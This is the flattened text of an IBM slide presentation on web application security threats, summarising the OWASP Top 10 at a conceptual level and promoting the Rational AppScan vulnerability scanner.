Securing Your Web Application against security vulnerabilities Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group
Agenda Security Landscape Vulnerability Analysis Automated Vulnerability Analysis IBM Rational AppScan Overview
The Myth: Our Site Is Safe We Have Firewalls and IPS in Place Port 80 & 443 are open for the right reasons We Audit It Once a Quarter with Pen Testers Applications are constantly changing We Use Network Vulnerability Scanners Neglect the security of the software on the network/web server We Use SSL Encryption Only protects data between site and user not the web application itself
Reality: Security and Spending Are Unbalanced of All Attacks on Information Security are 75% Directed to the Web Application Layer 2/3 of All Web Applications are Vulnerable **Gartner
The Alarming Reality Hacking Stage 6 Wikipedia, Feb 9 2007
Why Application Security is a High Priority Web applications are the #1 focus of hackers: 75% of attacks at Application layer (Gartner) XSS and SQL Injection are #1 and #2 reported vulnerabilities (Mitre) Most sites are vulnerable: 90% of sites are vulnerable to application attacks (Watchfire) 78% percent of easily exploitable vulnerabilities affected Web applications (Symantec) 80% of organizations will experience an application security incident by 2010 (Gartner) Web applications are high value targets for hackers: Customer data, credit cards, ID theft, fraud, site defacement, etc Compliance requirements: Payment Card Industry (PCI) Standards, GLBA, HIPPA, FISMA,
The Security Landscape of the past Traditional Infrastructure was easier to protect... Concrete entities that were easy to understand Attack surface and vectors were very well-defined Application footprint very static Perimeter defense was king
Changing Security Landscape of Today Webification has changed everything... Infrastructure is more abstract and less defined Everything needs a web interface Agents and heavy clients are no longer acceptable Traditional defenses no longer apply
High Level Web Application Architecture Review Customer App is deployed here Sensitive data is stored here Internet Firewall Client Tier (Browser) Protects Transport SSL Protects Network (Presentation) Middle Tier App Server (Business Logic) Database Data Tier
Security Network Defenses for Web Applications Perimeter IDS IPS App Firewall Firewall Intrusion Detection System Intrusion Prevention System Application Firewall System Incident Event Management (SIEM)
What Can Happen?
Why Do Hackers Today Target Applications? Because they know you have firewalls So its not very convenient to attack the network anymore But they still want to attack cos they still want to steal data Because firewalls do not protect against app attacks! So the hackers are having a field day! Very few people are actively aware of application security issues Because web sites have a large footprint No need to worry anymore about cumbersome IP addresses Because they can! It is difficult or impossible to write a comprehensively robust application Developers are yet to have secure coding as second nature Developers think differently from hackers Cheap, Fast, Good choose two, you can t have it all It is also a nightmare to manually QA the application White-box static code analyzers don t test for inter-app relationships Many companies today still do not have a software security QA policy or resource
Vulnerability Analysis
The OWASP Top 10 list Application Threat Negative Impact Example Impact Cross-Site scripting Injection Flaws Malicious File Execution Insecure Direct Object Reference Cross-Site Request Forgery Information Leakage and Improper Error Handling Broken Authentication & Session Management Insecure Cryptographic Storage Insecure Communications Failure to Restrict URL Access Identity Theft, Sensitive Information Leakage, Attacker can manipulate queries to the DB / LDAP / Other system Execute shell commands on server, up to full control Attacker can access sensitive files and resources Attacker can invoke blind actions on web applications, impersonating as a trusted user Attackers can gain detailed system information Session tokens not guarded or invalidated properly Weak encryption techniques may lead to broken encryption Sensitive info sent unencrypted over insecure channel Hacker can access unauthorized resources Hackers can impersonate legitimate users, and control their accounts. Hackers can access backend database information, alter it or steal it. Site modified to transfer all interactions to the hacker. Web application returns contents of sensitive file (instead of harmless one) Blind requests to bank account transfer money to hacker Malicious system reconnaissance may assist in developing further attacks Hacker can force session token on victim; session tokens can be stolen after logout Confidential information (SSN, Credit Cards) can be decrypted by malicious users Unencrypted credentials sniffed and used by hacker to impersonate user Hacker can forcefully browse and access a page past the login page
Automated Vulnerability Analysis IBM Rational AppScan
SECURITY TESTING IS PART OF SDLC QUALITY TESTING Collaborative Application Lifecycle Management SDLC Quality Assurance Quality Dashboard Requirements Management Test Management and Execution Defect Management Create Plan Build Tests Manage Test Lab Report Results Open Platform Best Practice Processes Functional Testing SAP Java Performance Testing TEAM SERVER Open Lifecycle Service Integrations Web Service Quality Code Quality System z, i.net Security and Compliance homegrown
DEVELOPMENT OPERATOINS AppScan in the Rational Portfolio BUSINESS SOFTWARE QUALITY SOLUTIONS Test and Change Management Requirements Test Change Rational RequisitePro Rational ClearQuest Rational ClearQuest Defects Rational ClearQuest Test Automation Developer Test Rational PurifyPlus Rational Test RealTime Functional Test Rational Functional Tester Plus Automated Manual Rational Rational Functional Tester Manual Tester Security and Compliance Test AppScan PolicyTester Performance Test Rational Performance Tester Rational Robot Quality Metrics Project Dashboards Detailed Test Results Quality Reports
Rational AppScan What is it? AppScan is an automated tool used to perform vulnerability assessments on Web Applications Why do I need it? To simplify finding and fixing web application security problems What does it do? Scans web applications, finds security issues and reports on them in an actionable fashion Who uses it? Security Auditors main users today QA engineers when the auditors become the bottle neck Developers to find issues as early as possible (most efficient)
How does AppScan work? Approaches an application as a black-box Traverses a web application and builds the site model Determines the attack vectors based on the selected Test policy Tests by sending modified HTTP requests to the application and examining the HTTP response according to validate rules HTTP Request Web Application Application HTTP Response Web Servers Databases
AppScan Goes Beyond Pointing out Problems
Scanning in Progress
Identify Vulnerabilities
Actionable Fix Recommendations
Reports